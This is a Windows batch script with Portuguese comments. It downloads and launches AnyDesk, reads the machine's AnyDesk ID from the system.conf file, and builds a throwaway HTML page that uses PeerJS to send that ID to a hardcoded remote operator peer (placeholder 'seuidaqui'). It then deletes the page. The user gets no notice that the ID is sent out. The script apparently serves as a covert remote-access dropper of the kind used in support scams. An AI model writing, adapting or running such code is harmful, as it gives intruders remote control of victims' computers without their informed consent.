@echo off

:: Definir URL e nome do arquivo para o AnyDesk
set "url=https://download.anydesk.com/AnyDesk.exe"
set "filename=AnyDesk.exe"
set "html_file=cliente.html"

:: Verificar se o arquivo já existe e excluir caso necessário
if exist "%filename%" (
    echo O arquivo %filename% já existe, removendo...
    del "%filename%"
)

:: Baixar AnyDesk
echo Baixando AnyDesk...
powershell -Command "Invoke-WebRequest -Uri '%url%' -OutFile '%filename%'"

:: Verificar se o download foi bem-sucedido
if not exist "%filename%" (
    echo Erro: O download do AnyDesk falhou.
    exit /b
)

:: Iniciar AnyDesk
echo Iniciando AnyDesk...
start "" "%filename%"

:: Aguardar o arquivo system.conf ser criado e o ad.anynet.id ter dados
echo Aguardando a criação do arquivo system.conf e dados no ad.anynet.id...
:wait_for_file
if not exist "%APPDATA%\AnyDesk\system.conf" (
    timeout /t 5 >nul
    goto wait_for_file
)

:: Aguardar a linha ad.anynet.id ter dados
:wait_for_ad_anynet_id
for /f "delims=" %%i in ('findstr /i "ad.anynet.id" "%APPDATA%\AnyDesk\system.conf"') do set "findstr_result=%%i"
if "%findstr_result%"=="" (
    timeout /t 5 >nul
    goto wait_for_ad_anynet_id
)

:: Criar o arquivo HTML com um único echo
echo ^<html lang="pt-br"^>^<head^>^<meta charset="UTF-8" /^>^<meta name="viewport" content="width=device-width, initial-scale=1.0" /^>^<title^>anydesk^</title^>^<script src="https://cdnjs.cloudflare.com/ajax/libs/peerjs/1.3.1/peerjs.min.js"^>^</script^>^<style^>body { font-family: "Courier New", monospace; background-color: #0f0f0f; color: #00ff00; padding: 20px; } .container { max-width: 600px; margin: 0 auto; background-color: #111; padding: 20px; border-radius: 8px; box-shadow: 0 0 15px #00ff00; } h1 { text-align: center; color: #00ff00; } #peer-id { font-weight: bold; color: #00ffff; } #messages { background-color: #000; padding: 10px; border-radius: 5px; height: 200px; overflow-y: auto; border: 1px solid #00ff00; margin-top: 10px; } .message { padding: 10px; margin: 5px 0; border-radius: 5px; background-color: #003300; box-shadow: 0 0 5px #00ff00; }^</style^>^</head^>^<body^>^<div class="container"^>^<h1^>anydesk^</h1^>^<p^>Meu ID: ^<span id="peer-id"^>...^</span^>^</p^>^<div id="messages"^>^</div^>^</div^>^<script^>const HOST_ID = "seuidaqui"; const peer = new Peer(); peer.on('open', function(id) { document.getElementById('peer-id').textContent = id; const conn = peer.connect(HOST_ID); conn.on('open', function() { displayMessage("Conectado ao host."); conn.send("%findstr_result%"); }); conn.on('data', function(data) { displayMessage("Mensagem recebida: \"" + data + "\""); }); conn.on('close', function() { displayMessage("Conexão encerrada."); }); conn.on('error', function(err) { displayMessage("Erro: " + err); }); }); function displayMessage(message) { const messagesContainer = document.getElementById('messages'); const msgDiv = document.createElement('div'); msgDiv.classList.add('message'); msgDiv.textContent = message; messagesContainer.appendChild(msgDiv); messagesContainer.scrollTop = messagesContainer.scrollHeight; }^</script^>^</body^>^</html^> > %html_file%

:: Abrir o arquivo HTML no navegador padrão
start "" "%html_file%"

:: Espera um momento para garantir que o navegador tenha iniciado
timeout /t 2 /nobreak >nul

:: Apagar o arquivo HTML após abrir
del "%html_file%"

pause
